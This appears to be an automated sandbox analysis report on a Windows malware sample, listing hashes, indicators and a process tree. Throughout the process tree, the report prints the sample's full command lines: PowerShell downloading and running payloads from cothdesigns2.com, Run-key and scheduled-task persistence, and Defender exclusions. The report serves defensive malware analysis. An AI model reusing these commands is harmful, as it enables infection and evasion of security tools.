Analysis
max time kernel: 64s
max time network: 117s
platform: windows7_x64
resource: win7-20220901-en
resource tags: arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
submitted: 14/09/2022, 07:17

Static task: static1

Behavioral task: behavioral1
Sample: d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe
Resource: win7-20220901-en

Behavioral task: behavioral2
Sample: d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe
Resource: win10v2004-20220812-en
General
Target: d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe
Size: 43KB
MD5: d26c5ebd1d7fb1d5b8f8ef313d408b3a
SHA1: 1a2386f8d8e5f64eaf404e74c97ed94dc50627c7
SHA256: c4ac79bf17fc00f26e2acdeeb0466da96ed9b928df1dd99b8c865a872bb2143d
SHA512: dcdb0c5b3128379974ed1604d9196a486c7610867a29b6d985e9baf37485eb96397ce96ff8bd15490e93d6135afa5ca17136bfaa25892a17d4919fded8897fc9
SSDEEP: 768:Z84x3tuZYVP1stOVTBdlDR0YIWEj+JtrU0bLekwijxBY1SVvKnxKcS8bgGbaG6gk:Vx3VVVzd7Ej+7tbLek7jxG1SVSnccS8a
Malware Config
Extracted: http://cothdesigns2.com:443/obieznne.msi
Extracted: http://cothdesigns2.com:443/H2022_Tool.msi
Extracted: http://cothdesigns2.com:443/cmd.msi
           http://cothdesigns2.com:443/xmlo.msi
Signatures

Adds policy Run key to start application (2 TTPs, 2 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\GoogleUpdateTask = "C:\\ProgramData\\Google\\software_reporter_tool.exe" | reg.exe

Blocklisted process makes network request (2 IoCs)
flow | pid | Process
11 | 1064 | powershell.exe
12 | 692 | powershell.exe

Adds Run key to start application (2 TTPs, 2 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdateTask = "C:\\ProgramData\\Google\\software_reporter_tool.exe" | reg.exe

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
3 | ip-api.com

Drops file in System32 directory (5 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
(the identical row is recorded 5 times in the report)

Program crash (1 IoCs)
pid | pid_target | Process | procid_target
1232 | 1752 | WerFault.exe | 26

Modifies registry key (1 TTPs, 2 IoCs)
pid | Process
268 | reg.exe
1568 | reg.exe

Suspicious behavior: EnumeratesProcesses (10 IoCs)
pid | Process
1752 | d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe (recorded 5 times)
856 | powershell.exe
692 | powershell.exe
968 | powershell.exe
108 | powershell.exe
1064 | powershell.exe

Suspicious use of AdjustPrivilegeToken (6 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 1752 | d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe
Token: SeDebugPrivilege | 856 | powershell.exe
Token: SeDebugPrivilege | 692 | powershell.exe
Token: SeDebugPrivilege | 968 | powershell.exe
Token: SeDebugPrivilege | 108 | powershell.exe
Token: SeDebugPrivilege | 1064 | powershell.exe

Suspicious use of WriteProcessMemory (27 IoCs)
Each row below is recorded 3 times in the report (9 distinct rows, 27 IoCs in total).
description | pid | Process | procid_target
PID 1752 wrote to memory of 1232 | 1752 | d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe | 41
PID 968 wrote to memory of 1304 | 968 | powershell.exe | 43
PID 108 wrote to memory of 1868 | 108 | powershell.exe | 42
PID 1868 wrote to memory of 520 | 1868 | cmd.exe | 44
PID 1304 wrote to memory of 268 | 1304 | cmd.exe | 45
PID 968 wrote to memory of 972 | 968 | powershell.exe | 46
PID 972 wrote to memory of 1568 | 972 | cmd.exe | 47
PID 108 wrote to memory of 2024 | 108 | powershell.exe | 48
PID 2024 wrote to memory of 1892 | 2024 | cmd.exe | 49
Processes
(indentation shows the parent/child nesting reported by the sandbox)

C:\Users\Admin\AppData\Local\Temp\d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe (PID 1752)
  Command line: "C:\Users\Admin\AppData\Local\Temp\d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
    C:\Windows\system32\WerFault.exe (PID 1232)
      Command line: C:\Windows\system32\WerFault.exe -u -p 1752 -s 1200
      - Program crash

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 108)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd.exe /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8;cmd.exe /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe (PID 1868)
      Command line: "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\netsh.exe (PID 520)
          Command line: netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8
    C:\Windows\system32\cmd.exe (PID 2024)
      Command line: "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\netsh.exe (PID 1892)
          Command line: netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 856)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\Temp';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'InstallUtil.exe';Add-MpPreference -ExclusionProcess 'software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'svchost.exe';Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\GoogleUpdate.exe';Add-MpPreference -ExclusionProcess 'powershell.exe';Add-MpPreference -ExclusionProcess 'cmd.exe';Add-MpPreference -ExclusionProcess 'GoogleUpdate.exe'
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 692)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/obieznne.msi','C:\ProgramData\Google\software_reporter_tool.exe');C:\ProgramData\Google\software_reporter_tool.exe
  - Blocklisted process makes network request
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 968)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd.exe /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe";cmd.exe /c reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe"
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe (PID 1304)
      Command line: "C:\Windows\system32\cmd.exe" /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\reg.exe (PID 268)
          Command line: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
          - Adds Run key to start application
          - Modifies registry key
    C:\Windows\system32\cmd.exe (PID 972)
      Command line: "C:\Windows\system32\cmd.exe" /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\reg.exe (PID 1568)
          Command line: reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
          - Adds policy Run key to start application
          - Modifies registry key

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1064)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/H2022_Tool.msi','C:\Windows\Temp\H2022_Tool.exe');C:\Windows\Temp\H2022_Tool.exe
  - Blocklisted process makes network request
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2008)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/cmd.msi','C:\ProgramData\Google\GoogleUpdate.exe');(New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/xmlo.msi','C:\Windows\Temp\.xml');cmd.exe /c schtasks /create /xml "C:\Windows\Temp\.xml" /tn "GoogleUpdateTask";cmd.exe /c del "C:\Windows\Temp\.xml"
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: 1fd0bfe7b147ca1730ba6b85f9f7a554
SHA1: 576bf591e3864cc49e4cad0bfda87ff0efb01b93
SHA256: 9662f51db6b42f0d115a0985014aa77ee83f660cc1c2c06d15801a06ad5b66bb
SHA512: bc2dfe64a22bfadd586ce0269c0c7cab7ac01a4922f6e49c8914fd05df6bf1a22d1005c464f7f7e0332f5cd1cf25b0ed1236b6f27ed71f0cbcb77542da9659c0